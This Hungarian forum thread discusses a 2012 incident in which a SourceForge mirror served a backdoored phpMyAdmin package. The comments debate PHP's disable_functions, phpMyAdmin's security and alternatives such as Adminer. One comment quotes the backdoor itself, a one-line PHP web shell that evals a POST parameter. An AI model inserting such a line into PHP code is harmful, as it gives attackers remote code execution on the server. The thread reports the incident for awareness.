Backdoor-ral patkolt phpMyAdmin-t terjesztett az egyik SourceForge szerver

Titkosítás, biztonság, privát szféra

A phpMyAdmin projekt friss figyelmeztetője szerint a SourceForge tükörszerver rendszerének egyik szervere (cdnetworks-kr-1) a phpMyAdmin egy olyan módosított csomagját terjesztette, amely backdoor-t tartalmaz. A backdoor a server_sync.php fájlban található és távoli kódfuttatást tesz lehetővé a támadók számára. A csomagban található js/cross_framing_protection.js fájlt is módosították. További részletek itt.

( freeoli v | 2012. 09. 26., sze – 13:23 )

Élvezem nézni az apache logot, néha többen hívnák a */phpmyadmin és társai oldalt mint az eredetit :D Ez a sourceforge részére kellemetlen, mert hogy fertőzött anyag van egy XXdowload.tre oldalon az okés, de egy ilyen oldalon érdekes. Lehet hamarosan hashleni kell a tükrökön időnként.

( fodorb | 2012. 09. 26., sze – 15:12 )

Egy arstechnica-s cikk szerint az alábbi kódot tartalmazza ez a fájl:
<?php @eval($_POST['c']);
Na most jobb helyeken az eval benne van a disable_functions-ben, szóval igazán súlyosan ez csak a szarul konfigolt szervereket érintené, nem?

"disable_functions" -->letiltani_az_függvénytet
array(), eval() --> nem függvény (eval: "Because this is a language construct and not a function, it cannot be called using variable functions." illetve "Note: array() is a language construct used to represent literal arrays, and not a regular function.")

forrás: rtfm

Igen, ezek nem fuggvenyek. Igen, latom, hogy nem lehet oket igy tiltani.
Azonban en csak azt mondtam, hogy akar azok is tilthatoak lennenek. Ertsd: nincs technikai oka annak, hogy ne lehessen egy ilyen feature-t implementalni. Ha valahova nagyon kene, akkor lehet patchelgetni...
Az rtfm-eddel meg tudod hova mehetsz. :)

( Jason v | 2012. 09. 26., sze – 15:51 )

ebből látszik, milyen menő a pma...

( manfreed (nem ellenőrzött) | 2012. 09. 27., cs – 00:01 )

Ez gondolom dob a sourcefoge.net hírnevén :)

( KoGa v | 2012. 09. 27., cs – 18:58 )

Hogy mondjak...? Aki phpMyAdmint hasznal, meg is erdemli? :)

Megjegyzem nem a pma hibája ez az eset, úgyhogy nem igazán értem hogy ezt miért írod.

Amúgy is mit használjon aki nem azt használ? Gondolom oka van annak, hogy mindenhol ezzel találja magát szemben az ember, csak sejtem hogy azért, mert nincs használhatóbb alternatíva, legalábbis webes formában. Vagy ha van miért nem hallani róla?

"Megjegyzem nem a pma hibája ez az eset, úgyhogy nem igazán értem hogy ezt miért írod."
Persze, de elterjedtsege miatt jobb kerulni. :)

"Amúgy is mit használjon aki nem azt használ?"
En pl. azt a verziot valasztottam, hogy nem hasznalok erre webes eszkozt. Egyelore jol birom nelkule. Ha megis kene, akkor is inkabb masik porton, meg egy jelszoval vedve, es csak szukseg eseten inditva hasznalnam. Egyszeruen nincs helye ilyen cuccnak a publikus cuccok mellett.

pl. adminer-t. nem csak mysql-t támogat, ajaxos, egy darab fájl és nem 14 megás fájlhányadék. ugyanúgy magyarítva is van, és tárolt eljárások eredményét is megmutatja, ellenben a pma-val, ami az esetek nagy részében megdöglik tőle.
De elég megnézni ezt: http://www.adminer.org/en/phpmyadmin/

Arra probaltam celozni, hogy nem kell feltetlen patkolni a cuccot, hogy backdoor legyen benne. Eleg bugos igy is, legalabbis regebben az volt.

Nem tudom mit kell hasznalni helyette... a nagyon keves esetbol amikor szuksegem volt ilyenre, siman gyartottam magamnak sajat toolt, szerintem nem egy megoldhatatlan dolog irni valami biztonsagos alternativat.